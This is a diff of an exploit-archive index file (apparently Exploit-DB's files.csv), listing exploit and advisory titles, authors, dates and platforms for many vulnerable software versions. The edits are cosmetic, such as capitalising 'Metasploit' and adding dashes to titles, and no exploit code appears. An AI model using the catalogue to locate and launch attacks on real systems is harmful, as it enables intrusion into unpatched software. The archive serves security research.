Erik Hojgaard",unix,local,0 @@ -19625,7 +19625,7 @@ id,file,description,date,author,platform,type,port 22372,platforms/php/webapps/22372.txt,"vam shop 1.69 - Multiple Vulnerabilities",2012-10-31,"Security Effect Team",php,webapps,0 22373,platforms/php/webapps/22373.txt,"PG Dating Pro 1.0 CMS - Multiple Vulnerabilities",2012-10-31,Vulnerability-Lab,php,webapps,0 22374,platforms/php/webapps/22374.txt,"WordPress Plugin foxypress 0.4.2.5 - Multiple Vulnerabilities",2012-10-31,waraxe,php,webapps,0 -22375,platforms/windows/remote/22375.rb,"Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow",2012-11-01,metasploit,windows,remote,0 +22375,platforms/windows/remote/22375.rb,"Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow",2012-11-01,Metasploit,windows,remote,0 22376,platforms/linux/local/22376.txt,"GNOME Eye Of Gnome 1.0.x/1.1.x/2.2 Format String",2003-03-28,"Core Security",linux,local,0 22377,platforms/cgi/webapps/22377.txt,"Kebi Academy 2001 Input Validation",2003-03-17,"dong-h0un U",cgi,webapps,0 22378,platforms/php/webapps/22378.txt,"MyAbraCadaWeb 1.0 Path Disclosure",2003-03-17,"gregory Le Bras",php,webapps,0 @@ -19680,7 +19680,7 @@ id,file,description,date,author,platform,type,port 22429,platforms/php/webapps/22429.txt,"vBulletin ChangUonDyU Advanced Statistics - SQL Injection",2012-11-02,Juno_okyo,php,webapps,0 22430,platforms/php/webapps/22430.txt,"PrestaShop <= 1.5.1 Persistent XSS",2012-11-02,"David Sopas",php,webapps,0 22431,platforms/php/webapps/22431.txt,"achievo 1.4.5 - Multiple Vulnerabilities (1)",2012-11-02,"Canberk BOLAT",php,webapps,0 -22432,platforms/windows/remote/22432.rb,"HP Intelligent Management Center UAM Buffer Overflow",2012-11-04,metasploit,windows,remote,0 +22432,platforms/windows/remote/22432.rb,"HP Intelligent Management Center UAM Buffer Overflow",2012-11-04,Metasploit,windows,remote,0 22433,platforms/linux/dos/22433.pl,"Monkey HTTP Daemon 0.4/0.5/0.6 Excessive POST Data Buffer Overflow",2003-03-24,"Matthew Murphy",linux,dos,0 22434,platforms/windows/remote/22434.txt,"Sambar Server 5.x Information Disclosure",2003-03-27,"gregory Le Bras",windows,remote,0 22435,platforms/php/dos/22435.php,"PHP 4.3.x/5.0 openlog() Buffer Overflow",2003-03-27,sir.mordred@hushmail.com,php,dos,0 @@ -19771,8 +19771,8 @@ id,file,description,date,author,platform,type,port 22570,platforms/windows/remote/22570.java,"Microsoft Windows Media Player 7.1 Skin File Code Execution",2003-05-07,"Jelmer Kuperus",windows,remote,0 22571,platforms/cgi/webapps/22571.pl,"HappyMall E-Commerce Software 4.3/4.4 Normal_HTML.CGI Command Execution",2003-05-07,"Revin Aldi",cgi,webapps,0 22524,platforms/php/webapps/22524.txt,"zenphoto 1.4.3.3 - Multiple Vulnerabilities",2012-11-06,waraxe,php,webapps,0 -22525,platforms/windows/remote/22525.rb,"EMC Networker Format String",2012-11-07,metasploit,windows,remote,0 -22526,platforms/windows/remote/22526.rb,"WinRM VBS Remote Code Execution",2012-11-07,metasploit,windows,remote,0 +22525,platforms/windows/remote/22525.rb,"EMC Networker Format String",2012-11-07,Metasploit,windows,remote,0 +22526,platforms/windows/remote/22526.rb,"WinRM VBS Remote Code Execution",2012-11-07,Metasploit,windows,remote,0 22527,platforms/linux/dos/22527.c,"Xeneo Web Server 2.2.10 Undisclosed Buffer Overflow",2003-04-23,badpack3t,linux,dos,0 22528,platforms/windows/local/22528.c,"Microsoft Windows 2000 RegEdit.EXE Registry Key Value Buffer Overflow",2003-04-09,ThreaT,windows,local,0 22529,platforms/asp/webapps/22529.txt,"Battleaxe Software BTTLXE Forum Login.ASP SQL Injection",2003-04-23,Du|L,asp,webapps,0 @@ -19821,8 +19821,8 @@ id,file,description,date,author,platform,type,port 22574,platforms/freebsd/local/22574.pl,"Lgames LTris 1.0.1 - Local Memory Corruption",2003-05-09,"Knud Erik Hojgaard",freebsd,local,0 22575,platforms/windows/remote/22575.txt,"Microsoft Internet Explorer 5/6 - file:// Request Zone Bypass",2003-05-09,"Marek Bialoglowy",windows,remote,0 22576,platforms/windows/dos/22576.txt,"Microsoft SQL Server 7.0/2000 JET Database Engine 4.0 - Buffer Overrun",2003-05-09,cesaro,windows,dos,0 -22577,platforms/php/webapps/22577.txt,"ttCMS 2.2 / ttForum 1.1 News.php template Parameter Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 -22578,platforms/php/webapps/22578.txt,"ttCMS 2.2 / ttForum 1.1 install.php installdir Parameter Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 +22577,platforms/php/webapps/22577.txt,"ttCMS 2.2 - / ttForum 1.1 News.php template Parameter Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 +22578,platforms/php/webapps/22578.txt,"ttCMS 2.2 - / ttForum 1.1 install.php installdir Parameter Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 22579,platforms/php/webapps/22579.txt,"Phorum 3.4.x Message Form Field HTML Injection Variant",2003-05-09,WiciU,php,webapps,0 22580,platforms/freebsd/local/22580.c,"Firebird 1.0 GDS_Inet_Server Interbase Environment Variable Buffer Overflow",2003-05-10,bob,freebsd,local,0 22581,platforms/windows/dos/22581.pl,"Youngzsoft CMailServer 4.0 MAIL FROM Buffer Overflow",2003-05-10,"Dennis Rand",windows,dos,0 @@ -19901,7 +19901,7 @@ id,file,description,date,author,platform,type,port 22654,platforms/php/webapps/22654.txt,"bananadance wiki b2.2 - Multiple Vulnerabilities",2012-11-12,Vulnerability-Lab,php,webapps,0 22655,platforms/windows/dos/22655.txt,"Microsoft Publisher 2013 Crash PoC",2012-11-12,coolkaveh,windows,dos,0 22656,platforms/php/webapps/22656.py,"vBulletin vBay <= 1.1.9 - Error-Based SQL Injection",2012-11-12,"Dan UK",php,webapps,0 -22657,platforms/multiple/remote/22657.rb,"Java Applet JAX-WS Remote Code Execution",2012-11-13,metasploit,multiple,remote,0 +22657,platforms/multiple/remote/22657.rb,"Java Applet JAX-WS Remote Code Execution",2012-11-13,Metasploit,multiple,remote,0 22658,platforms/linux/remote/22658.pl,"Batalla Naval 1.0 4 - Remote Buffer Overflow (1)",2003-05-26,wsxz,linux,remote,0 22659,platforms/linux/remote/22659.c,"Batalla Naval 1.0 4 - Remote Buffer Overflow (2)",2003-05-26,jsk,linux,remote,0 22660,platforms/php/dos/22660.txt,"PostNuke Phoenix 0.72x - Rating System Denial of Service",2003-05-26,"Lorenzo Manuel Hernandez Garcia-Hierro",php,dos,0 @@ -19929,7 +19929,7 @@ id,file,description,date,author,platform,type,port 22683,platforms/linux/local/22683.pl,"HT Editor 2.0.20 - Buffer Overflow (ROP PoC)",2012-11-13,ZadYree,linux,local,0 22684,platforms/php/webapps/22684.txt,"Eventy CMS 1.8 Plus - Multiple Vulnerabilities",2012-11-13,Vulnerability-Lab,php,webapps,0 22685,platforms/windows/dos/22685.txt,"Zoner Photo Studio 15 b3 - Buffer Overflow Vulnerabilities",2012-11-13,Vulnerability-Lab,windows,dos,0 -22686,platforms/php/remote/22686.rb,"Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution",2012-11-13,metasploit,php,remote,0 +22686,platforms/php/remote/22686.rb,"Invision IP.Board <= 3.3.4 unserialize() PHP Code Execution",2012-11-13,Metasploit,php,remote,0 22687,platforms/php/webapps/22687.pl,"Webfroot Shoutbox 2.32 - Remote Command Execution",2003-05-29,pokleyzz,php,webapps,0 22688,platforms/cgi/webapps/22688.txt,"M-TECH P-Synch 6.2.5 nph-psf.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 22689,platforms/cgi/webapps/22689.txt,"M-TECH P-Synch 6.2.5 nph-psa.exe css Parameter Remote File Inclusion",2003-05-29,JeiAr,cgi,webapps,0 @@ -19938,7 +19938,7 @@ id,file,description,date,author,platform,type,port 22692,platforms/cgi/webapps/22692.txt,"Zeus Web Server 4.x Admin Interface VS_Diag.CGI Cross-Site Scripting",2003-05-29,"Hugo Vazquez",cgi,webapps,0 22693,platforms/php/webapps/22693.txt,"cPanel 5/6_Formail-Clone E-Mail Restriction Bypass",2003-05-30,"Chad C. Keep",php,webapps,0 22694,platforms/windows/dos/22694.c,"Desktop Orbiter 2.0 1 Resource Exhaustion Denial of Service",2003-05-30,"Luca Ercoli",windows,dos,0 -22695,platforms/linux/local/22695.pl,"RedHat 9.0_Slackware 8.1 /bin/mail Carbon Copy Field Buffer Overrun",2003-05-30,mark@vulndev.org,linux,local,0 +22695,platforms/linux/local/22695.pl,"RedHat 9.0_Slackware 8.1 - /bin/mail Carbon Copy Field Buffer Overrun",2003-05-30,mark@vulndev.org,linux,local,0 22696,platforms/php/remote/22696.txt,"PHP 4.x Transparent Session ID Cross-Site Scripting",2003-05-30,"Sverre H. Huseby",php,remote,0 22697,platforms/asp/webapps/22697.asp,"iisCart2000 - Arbitrary File Upload",2003-05-31,Bosen,asp,webapps,0 22698,platforms/asp/webapps/22698.pl,"WebCortex WebStores2000 SQL Injection",2003-05-31,Bosen,asp,webapps,0 @@ -19957,7 +19957,7 @@ id,file,description,date,author,platform,type,port 22710,platforms/php/webapps/22710.txt,"friendsinwar FAQ Manager SQL Injection (authbypass)",2012-11-14,d3b4g,php,webapps,0 22711,platforms/php/webapps/22711.txt,"Myrephp Business Directory - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 22712,platforms/php/webapps/22712.txt,"MYREphp Vacation Rental Software - Multiple Vulnerabilities",2012-11-14,d3b4g,php,webapps,0 -22714,platforms/windows/remote/22714.rb,"Oracle Database Client System Analyzer Arbitrary File Upload",2012-11-15,metasploit,windows,remote,0 +22714,platforms/windows/remote/22714.rb,"Oracle Database Client System Analyzer Arbitrary File Upload",2012-11-15,Metasploit,windows,remote,0 22715,platforms/php/webapps/22715.txt,"WebChat 2.0 Users.php Database Username Disclosure Weakness",2003-06-02,"Rynho Zeros Web",php,webapps,0 22716,platforms/php/webapps/22716.txt,"WebChat 2.0 Users.php Cross-Site Scripting",2003-06-02,"Rynho Zeros Web",php,webapps,0 22717,platforms/php/webapps/22717.txt,"SPChat 0.8 Module Remote File Include",2003-06-02,"Rynho Zeros Web",php,webapps,0 @@ -20027,7 +20027,7 @@ id,file,description,date,author,platform,type,port 22784,platforms/windows/remote/22784.txt,"Microsoft Internet Explorer 5 Custom HTTP Error HTML Injection",2003-06-17,"GreyMagic Software",windows,remote,0 22785,platforms/windows/remote/22785.txt,"MyServer 0.4.1/0.4.2 HTTP Server Directory Traversal",2003-06-17,"Ziv Kamir",windows,remote,0 22786,platforms/linux/remote/22786.c,"Dune 0.6.7 HTTP Get Remote Buffer Overrun",2003-06-17,V9,linux,remote,0 -22787,platforms/windows/remote/22787.rb,"NFR Agent FSFUI Record File Upload RCE",2012-11-19,metasploit,windows,remote,0 +22787,platforms/windows/remote/22787.rb,"NFR Agent FSFUI Record File Upload RCE",2012-11-19,Metasploit,windows,remote,0 22788,platforms/windows/dos/22788.pl,"CesarFTP 0.99 g Remote Username Buffer Overrun",2003-03-30,dr_insane,windows,dos,0 22789,platforms/windows/dos/22789.pl,"CesarFTP 0.99 g Remote CWD Denial of Service",2003-03-30,dr_insane,windows,dos,0 22790,platforms/windows/dos/22790.txt,"GuildFTPD 0.999.8 CWD Command Denial of Service",2003-05-12,dr_insane,windows,dos,0 @@ -20048,7 +20048,7 @@ id,file,description,date,author,platform,type,port 22805,platforms/jsp/webapps/22805.txt,"Tmax Soft JEUS 3.1.4 p1 URL.JSP Cross-Site Scripting",2003-06-17,"Jeremy Bae",jsp,webapps,0 22806,platforms/linux/local/22806.sh,"SDFingerD 1.1 - Failure To Drop Privileges Local Privilege Escalation",2003-06-19,V9,linux,local,0 22807,platforms/windows/remote/22807.txt,"SurfControl Web Filter 4.2.0.1 - File Disclosure",2003-06-19,"thomas adams",windows,remote,0 -22808,platforms/php/webapps/22808.txt,"pMachine 1.0/2.x /lib/ Multiple Script Direct Request Path Disclosure",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 +22808,platforms/php/webapps/22808.txt,"pMachine 1.0/2.x - /lib/ Multiple Script Direct Request Path Disclosure",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22809,platforms/php/webapps/22809.txt,"pMachine 1.0/2.x - Multiple Script sfx Parameter Path Disclosure",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22810,platforms/php/webapps/22810.txt,"pMachine 1.0/2.x Search Module Cross-Site Scripting",2003-06-19,"Lorenzo Hernandez Garcia-Hierro",php,webapps,0 22811,platforms/bsd/local/22811.c,"Abuse-SDL 0.7 Command-Line Argument Buffer Overflow",2003-06-19,Matrix_DK,bsd,local,0 @@ -20095,7 +20095,7 @@ id,file,description,date,author,platform,type,port 22853,platforms/php/webapps/22853.txt,"WordPress Facebook Survey 1.0 - SQL Injection",2012-11-20,"Vulnerability Research Laboratory",php,webapps,0 22854,platforms/windows/remote/22854.txt,"LAN.FS Messenger 2.4 - Command Execution",2012-11-20,Vulnerability-Lab,windows,remote,0 22855,platforms/windows/dos/22855.txt,"Apple QuickTime 7.7.2 Targa image Buffer Overflow",2012-11-20,"Senator of Pirates",windows,dos,0 -22856,platforms/linux/remote/22856.rb,"Narcissus Image Configuration Passthru",2012-11-21,metasploit,linux,remote,0 +22856,platforms/linux/remote/22856.rb,"Narcissus Image Configuration Passthru",2012-11-21,Metasploit,linux,remote,0 22857,platforms/jsp/webapps/22857.txt,"Verity K2 Toolkit 2.20 Query Builder Search Script Cross-Site Scripting",2003-07-02,"SSR Team",jsp,webapps,0 22858,platforms/openbsd/remote/22858.txt,"OpenBSD 3.x PF RDR Network Information Leakage",2003-07-02,Ed3f,openbsd,remote,0 22859,platforms/multiple/dos/22859.txt,"Axis Print Server 6.15/6.20 Web Interface Denial of Service",2003-07-03,"Ian Vitek",multiple,dos,0 @@ -20145,9 +20145,9 @@ id,file,description,date,author,platform,type,port 22900,platforms/windows/dos/22900.php,"StarSiege Tribes Server Denial of Service (2)",2003-07-14,st0ic,windows,dos,0 22901,platforms/php/webapps/22901.txt,"BlazeBoard 1.0 Information Disclosure",2003-07-14,JackDaniels,php,webapps,0 22902,platforms/linux/dos/22902.sh,"lighttpd 1.4.31 - Denial of Service PoC",2012-11-22,t4c,linux,dos,0 -22903,platforms/windows/remote/22903.rb,"NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution",2012-11-22,metasploit,windows,remote,0 +22903,platforms/windows/remote/22903.rb,"NetIQ Privileged User Manager 2.3.1 ldapagnt_eval() Remote Perl Code Execution",2012-11-22,Metasploit,windows,remote,0 22904,platforms/linux/dos/22904.py,"TrouSerS Denial of Service",2012-11-23,"Andy Lutomirski",linux,dos,0 -22905,platforms/windows/remote/22905.rb,"Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow",2012-11-24,metasploit,windows,remote,0 +22905,platforms/windows/remote/22905.rb,"Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow",2012-11-24,Metasploit,windows,remote,0 22906,platforms/php/webapps/22906.txt,"jBilling 3.0.2 - Cross-Site Scripting",2012-11-25,"Woody Hughes",php,webapps,0 22907,platforms/php/webapps/22907.txt,"ES CmS 0.1 - SQL Injection",2012-11-25,"hossein beizaee",php,webapps,0 22908,platforms/linux/remote/22908.c,"Exceed 5.0/6.0/6.1/7.1/8.0 Font Name Handler Buffer Overflow",2003-07-15,c0ntex,linux,remote,0 @@ -20195,10 +20195,10 @@ id,file,description,date,author,platform,type,port 22928,platforms/linux/local/22928.pl,"mcrypt <= 2.5.8 - Stack Based Overflow",2012-11-26,Tosh,linux,local,0 22929,platforms/php/webapps/22929.txt,"BuyClassifiedScript PHP Code Injection",2012-11-26,d3b4g,php,webapps,0 22931,platforms/windows/local/22931.py,"BlazeVideo HDTV Player 6.6 Professional (Direct Retn)",2012-11-26,Nezim,windows,local,0 -22932,platforms/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x (Direct Retn)",2012-11-26,Nezim,windows,local,0 +22932,platforms/windows/local/22932.py,"Aviosoft Digital TV Player Professional 1.x - (Direct Retn)",2012-11-26,Nezim,windows,local,0 22961,platforms/php/webapps/22961.txt,"Gallery 1.2/1.3.x Search Engine Cross-Site Scripting",2003-07-27,"Larry Nguyen",php,webapps,0 -23006,platforms/php/remote/23006.rb,"Network Shutdown Module <= 3.21 (sort_values) Remote PHP Code Injection",2012-11-29,metasploit,php,remote,0 -23007,platforms/windows/local/23007.rb,"Windows AlwaysInstallElevated MSI",2012-11-29,metasploit,windows,local,0 +23006,platforms/php/remote/23006.rb,"Network Shutdown Module <= 3.21 - (sort_values) Remote PHP Code Injection",2012-11-29,Metasploit,php,remote,0 +23007,platforms/windows/local/23007.rb,"Windows AlwaysInstallElevated MSI",2012-11-29,Metasploit,windows,local,0 23008,platforms/php/webapps/23008.txt,"DCForum+ 1.2 Subject Field HTML Injection",2003-08-11,G00db0y,php,webapps,0 23009,platforms/php/webapps/23009.txt,"Stellar Docs 1.2 Path Disclosure",2003-08-11,G00db0y,php,webapps,0 23010,platforms/php/webapps/23010.txt,"Better Basket Pro 3.0 Store Builder Remote Path Disclosure",2003-08-11,G00db0y,php,webapps,0 @@ -20218,7 +20218,7 @@ id,file,description,date,author,platform,type,port 22970,platforms/windows/dos/22970.txt,"NetScreen ScreenOS 4.0.1/4.0.3 TCP Window Size Remote Denial of Service",2003-07-29,"Papa loves Mambo",windows,dos,0 22971,platforms/linux/local/22971.txt,"ManDB Utility 2.3/2.4 - Local Buffer Overflow Vulnerabilities",2003-07-29,V9,linux,local,0 22972,platforms/windows/webapps/22972.txt,"gleamtech filevista/fileultimate 4.6 - Directory Traversal",2012-11-28,"Soroush Dalili",windows,webapps,0 -22973,platforms/windows/remote/22973.rb,"Apple QuickTime 7.7.2 MIME Type Buffer Overflow",2012-11-28,metasploit,windows,remote,0 +22973,platforms/windows/remote/22973.rb,"Apple QuickTime 7.7.2 MIME Type Buffer Overflow",2012-11-28,Metasploit,windows,remote,0 22974,platforms/unix/remote/22974.c,"wu-ftpd 2.6.2 - realpath() Off-By-One Buffer Overflow",2003-08-02,Xpl017Elz,unix,remote,0 23003,platforms/windows/dos/23003.py,"UMPlayer Portable 0.95 Crash PoC",2012-11-29,p3kok,windows,dos,0 22975,platforms/unix/remote/22975.c,"wu-ftpd 2.6.2_ 2.6.0_ 2.6.1 - realpath() Off-By-One Buffer Overflow",2003-08-06,Xpl017Elz,unix,remote,0 @@ -20262,7 +20262,7 @@ id,file,description,date,author,platform,type,port 23025,platforms/cgi/webapps/23025.txt,"SurgeLDAP 1.0 d User.CGI Cross-Site Scripting",2003-08-13,"Ziv Kamir",cgi,webapps,0 23026,platforms/php/webapps/23026.txt,"Xoops 1.0/1.3.x BBCode HTML Injection",2003-08-13,frog,php,webapps,0 23027,platforms/php/webapps/23027.txt,"HolaCMS 1.2.x HTMLtags.php Local File Include",2003-08-13,"Virginity Security",php,webapps,0 -23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 (packages.php id param) SQL Injection",2012-11-30,"Yakir Wizman",php,webapps,0 +23028,platforms/php/webapps/23028.txt,"Free Hosting Manager 2.0 - (packages.php id param) SQL Injection",2012-11-30,"Yakir Wizman",php,webapps,0 23029,platforms/php/webapps/23029.txt,"SmartCMS (index.php menuitem param) SQL Injection & Cross-Site Scripting Vulnerabilities",2012-11-30,"Yakir Wizman",php,webapps,0 23032,platforms/asp/webapps/23032.txt,"Clickcess ChitChat.NET name XSS",2003-08-13,G00db0y,asp,webapps,0 23033,platforms/asp/webapps/23033.txt,"Clickcess ChitChat.NET topic title XSS",2003-08-13,G00db0y,asp,webapps,0 @@ -20281,7 +20281,7 @@ id,file,description,date,author,platform,type,port 23049,platforms/linux/remote/23049.c,"Srcpd 2.0 - Multiple Buffer Overflow Vulnerabilities",2003-08-21,Over_G,linux,remote,0 23050,platforms/multiple/dos/23050.txt,"Avant Browser 8.0.2 Long HTTP Request Buffer Overflow",2003-08-21,nimber@designer.ru,multiple,dos,0 23051,platforms/multiple/dos/23051.txt,"WapServ 1.0 - Denial of Service Vulnerabilities",2003-08-22,"Blue eyeguy4u",multiple,dos,0 -23052,platforms/windows/local/23052.rb,"BlazeVideo HDTV Player Pro 6.6 - Filename Handling",2012-12-01,metasploit,windows,local,0 +23052,platforms/windows/local/23052.rb,"BlazeVideo HDTV Player Pro 6.6 - Filename Handling",2012-12-01,Metasploit,windows,local,0 23053,platforms/windows/dos/23053.pl,"Vpop3d Remote Denial of Service",2003-08-22,daniels@legend.co.uk,windows,dos,0 23054,platforms/linux/remote/23054.txt,"WIDZ 1.0/1.5 - Remote Root Compromise",2003-08-23,kf,linux,remote,0 23055,platforms/asp/webapps/23055.txt,"IdealBB 1.4.9 Beta HTML Injection",2003-08-23,"Scott M",asp,webapps,0 @@ -20360,7 +20360,7 @@ id,file,description,date,author,platform,type,port 23130,platforms/windows/dos/23130.txt,"Gordano Messaging Suite 9.0 WWW.exe Denial of Service",2003-09-10,"Phuong Nguyen",windows,dos,0 23131,platforms/windows/remote/23131.txt,"Microsoft Internet Explorer 6.0 Script Execution Vulnerabilities",2003-09-10,"Liu Die Yu and Jelmer",windows,remote,0 23132,platforms/windows/webapps/23132.py,"Advantech Studio 7.0 - SCADA/HMI Directory Traversal (0Day)",2012-12-04,Nin3,windows,webapps,0 -23224,platforms/multiple/remote/23224.rb,"Splunk 5.0 Custom App Remote Code Execution",2012-12-09,metasploit,multiple,remote,0 +23224,platforms/multiple/remote/23224.rb,"Splunk 5.0 Custom App Remote Code Execution",2012-12-09,Metasploit,multiple,remote,0 23135,platforms/windows/remote/23135.txt,"FloosieTek FTGatePro 1.2 WebAdmin Interface Information Disclosure Weakness",2003-09-10,"Phuong Nguyen",windows,remote,0 23136,platforms/multiple/remote/23136.txt,"futurewave webx server 1.1 - Directory Traversal",2003-09-10,dr_insane,multiple,remote,0 23137,platforms/multiple/remote/23137.txt,"CacheFlow CacheOS 4.1.10016 HTTP HOST Proxy",2003-09-10,"Tim Kennedy",multiple,remote,0 @@ -20381,8 +20381,8 @@ id,file,description,date,author,platform,type,port 23152,platforms/windows/remote/23152.txt,"Yahoo! Webcam ActiveX Control 2.0.0.107 - Buffer Overrun",2003-09-16,cesaro,windows,remote,0 23153,platforms/cgi/webapps/23153.txt,"NetWin DBabble 2.5 i Cross-Site Scripting",2003-09-16,dr_insane,cgi,webapps,0 23154,platforms/linux/local/23154.c,"Sendmail 8.12.9 Prescan() Variant Remote Buffer Overrun",2003-09-17,"Gyan Chawdhary",linux,local,0 -23155,platforms/windows/remote/23155.rb,"Ektron 8.02 XSLT Transform Remote Code Execution",2012-12-05,metasploit,windows,remote,0 -23156,platforms/unix/remote/23156.rb,"Tectia SSH USERAUTH Change Request Password Reset",2012-12-05,metasploit,unix,remote,0 +23155,platforms/windows/remote/23155.rb,"Ektron 8.02 XSLT Transform Remote Code Execution",2012-12-05,Metasploit,windows,remote,0 +23156,platforms/unix/remote/23156.rb,"Tectia SSH USERAUTH Change Request Password Reset",2012-12-05,Metasploit,unix,remote,0 23157,platforms/windows/remote/23157.txt,"Plug and Play Web Server 1.0 002c Directory Traversal",2003-09-18,"Bahaa Naamneh",windows,remote,0 23158,platforms/php/webapps/23158.txt,"Mambo Site Server 4.0.14 banners.php bid Parameter SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 23159,platforms/php/webapps/23159.txt,"Mambo Site Server 4.0.14 emailarticle.php id Parameter SQL Injection",2003-09-18,"Lifo Fifo",php,webapps,0 @@ -20403,9 +20403,9 @@ id,file,description,date,author,platform,type,port 23174,platforms/multiple/remote/23174.txt,"TCLHttpd 3.4.2 - Multiple Cross-Site Scripting Vulnerabilities",2003-09-24,"Phuong Nguyen",multiple,remote,0 23175,platforms/php/webapps/23175.txt,"yMonda Thread-IT 1.6 - Multiple Fields HTML Injection",2003-09-24,"Bahaa Naamneh",php,webapps,0 23176,platforms/multiple/remote/23176.txt,"NullLogic Null HTTPd 0.5.1 Error Page Long HTTP Request Cross-Site Scripting Vulnerablity",2003-09-24,"Luigi Auriemma",multiple,remote,0 -23177,platforms/windows/dos/23177.txt,"NVIDIA Install Application 2.1002.85.551 (NVI2.dll) Unicode Buffer Overflow PoC",2012-12-06,LiquidWorm,windows,dos,0 -23178,platforms/multiple/remote/23178.rb,"Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution",2012-12-06,metasploit,multiple,remote,0 -23179,platforms/windows/remote/23179.rb,"Oracle MySQL for Microsoft Windows MOF Execution",2012-12-06,metasploit,windows,remote,0 +23177,platforms/windows/dos/23177.txt,"NVIDIA Install Application 2.1002.85.551 - (NVI2.dll) Unicode Buffer Overflow PoC",2012-12-06,LiquidWorm,windows,dos,0 +23178,platforms/multiple/remote/23178.rb,"Adobe IndesignServer 5.5 SOAP Server Arbitrary Script Execution",2012-12-06,Metasploit,multiple,remote,0 +23179,platforms/windows/remote/23179.rb,"Oracle MySQL for Microsoft Windows MOF Execution",2012-12-06,Metasploit,windows,remote,0 23180,platforms/php/webapps/23180.txt,"Kordil EDms 2.2.60rc3 - SQL Injection",2012-12-06,"Woody Hughes",php,webapps,0 23181,platforms/multiple/dos/23181.txt,"NullLogic Null HTTPd 0.5 - Remote Denial of Service",2003-09-24,"Luigi Auriemma",multiple,dos,0 23182,platforms/linux/remote/23182.c,"CFEngine 2.0.x CFServD Transaction Packet Buffer Overrun (1)",2003-09-25,jsk,linux,remote,0 @@ -20429,7 +20429,7 @@ id,file,description,date,author,platform,type,port 23200,platforms/linux/dos/23200.txt,"Gamespy 3d 2.62/2.63 IRC Client Remote Buffer Overflow",2003-09-30,"Luigi Auriemma",linux,dos,0 23201,platforms/windows/dos/23201.txt,"VLC Media Player 2.0.4 - (.swf) Crash PoC",2012-12-07,coolkaveh,windows,dos,0 23202,platforms/freebsd/webapps/23202.txt,"m0n0wall 1.33 - Multiple CSRF Vulnerabilities",2012-12-07,"Yann CAM",freebsd,webapps,0 -23203,platforms/windows/remote/23203.rb,"IBM System Director Agent DLL Injection",2012-12-07,metasploit,windows,remote,0 +23203,platforms/windows/remote/23203.rb,"IBM System Director Agent DLL Injection",2012-12-07,Metasploit,windows,remote,0 23204,platforms/linux/local/23204.c,"Silly Poker 0.25.5 - Local HOME Environment Variable Buffer Overrun",2003-09-30,demz,linux,local,0 23205,platforms/php/webapps/23205.txt,"DCP-Portal 5.5 advertiser.php password Parameter SQL Injection",2003-10-01,"Lifo Fifo",php,webapps,0 23206,platforms/php/webapps/23206.txt,"DCP-Portal 5.5 lostpassword.php email Parameter SQL Injection",2003-10-01,"Lifo Fifo",php,webapps,0 @@ -20450,9 +20450,9 @@ id,file,description,date,author,platform,type,port 23221,platforms/multiple/remote/23221.txt,"JBoss 3.0.8/3.2.1 HSQLDB Remote Command Injection",2003-10-06,"Marc Schoenefeld",multiple,remote,0 23222,platforms/windows/remote/23222.txt,"File Sharing Software Easy File Sharing Web Server 1.2 Information Disclosure",2003-10-06,nimber@designer.ru,windows,remote,0 23223,platforms/linux/local/23223.c,"SuSE Linux Professional 8.2 SuSEWM Configuration File Insecure Temporary File",2003-10-06,"Nash Leon",linux,local,0 -23225,platforms/windows/remote/23225.rb,"Maxthon3 about:history XCS Trusted Zone Code Execution",2012-12-09,metasploit,windows,remote,0 -23226,platforms/windows/remote/23226.rb,"FreeFloat FTP Server Arbitrary File Upload",2012-12-09,metasploit,windows,remote,21 -23227,platforms/unix/remote/23227.rb,"Nagios XI Network Monitor Graph Explorer Component Command Injection",2012-12-09,metasploit,unix,remote,0 +23225,platforms/windows/remote/23225.rb,"Maxthon3 about:history XCS Trusted Zone Code Execution",2012-12-09,Metasploit,windows,remote,0 +23226,platforms/windows/remote/23226.rb,"FreeFloat FTP Server Arbitrary File Upload",2012-12-09,Metasploit,windows,remote,21 +23227,platforms/unix/remote/23227.rb,"Nagios XI Network Monitor Graph Explorer Component Command Injection",2012-12-09,Metasploit,unix,remote,0 23228,platforms/linux/local/23228.c,"SLocate 2.6 User-Supplied Database Heap Overflow",2003-10-06,"Patrik Hornik",linux,local,0 23229,platforms/windows/remote/23229.cpp,"Microsoft Windows XP/2000/2003 Message Queuing Service Heap Overflow",2003-10-07,DaveK,windows,remote,0 23230,platforms/multiple/remote/23230.txt,"Adobe SVG Viewer 3.0 postURL/getURL Restriction Bypass",2003-10-07,"GreyMagic Software",multiple,remote,0 @@ -20516,7 +20516,7 @@ id,file,description,date,author,platform,type,port 23287,platforms/php/webapps/23287.txt,"MyBB Profile Blogs Plugin 1.2 - Multiple Vulnerabilities",2012-12-11,Zixem,php,webapps,0 23288,platforms/windows/dos/23288.txt,"IrfanView 4.33 IMXCF.DLL Plugin Code Execution",2012-12-11,beford,windows,dos,0 23289,platforms/php/webapps/23289.txt,"PHP-Nuke 8.2.4 - CSRF",2012-12-11,sajith,php,webapps,0 -23290,platforms/windows/remote/23290.rb,"HP Data Protector DtbClsLogin Buffer Overflow",2012-12-11,metasploit,windows,remote,0 +23290,platforms/windows/remote/23290.rb,"HP Data Protector DtbClsLogin Buffer Overflow",2012-12-11,Metasploit,windows,remote,0 23313,platforms/php/webapps/23313.txt,"Ledscripts LedForums Multiple Fileds HTML Injection",2003-10-30,ProXy,php,webapps,0 23291,platforms/multiple/remote/23291.txt,"Opera Web Browser 7 IFRAME Zone Restriction Bypass",2003-10-24,Mindwarper,multiple,remote,0 23292,platforms/multiple/dos/23292.java,"Sun Microsystems Java Virtual Machine 1.x Security Manager Denial of 